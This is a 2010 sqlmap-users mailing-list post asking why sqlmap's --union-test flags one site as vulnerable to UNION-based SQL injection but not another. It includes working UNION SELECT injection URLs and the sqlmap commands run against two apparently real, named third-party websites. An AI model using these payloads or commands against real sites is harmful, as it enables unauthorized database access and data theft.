[sqlmap-users] SQLmap doesn't find union sql injection
Brought to you by:
inquisb
From: <rez...@se...> - 2010-02-12 14:31:19
|
Hello, I've just tested sqlmap 0.7 with --union-test option and I have a question. There are two sites vuln. to SQL Injection with UNION statement: http://www.hotlink.com.br/noticias_show.php?id=-1%20union%20all%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,%2020,21,22,23,24-- and http://www.osa.cz/page4.php?t=-1%20UNION%20ALL%20SELECT%201,2,3,4,version%28%29,6,7,8,9 So a run these two command: $ sqlmap.py -u "http://www.hotlink.com.br/noticias_show.php?id=2868" --union-test and $ sqlmap.py -u "http://www.osa.cz/page4.php?t=129" --union-test In the first case, sqlmap correctly tells mi that site is vulnerable to union sql injection. That's good. But in the second case sqlmap tells, that site isn't vulnerable to that kind of sql injection in spite of it is (see the link above). These two scenerios looks to me very similar, so my question is, where is the problem and why sqlmap can't find union sql injection in the second case. Thank you. |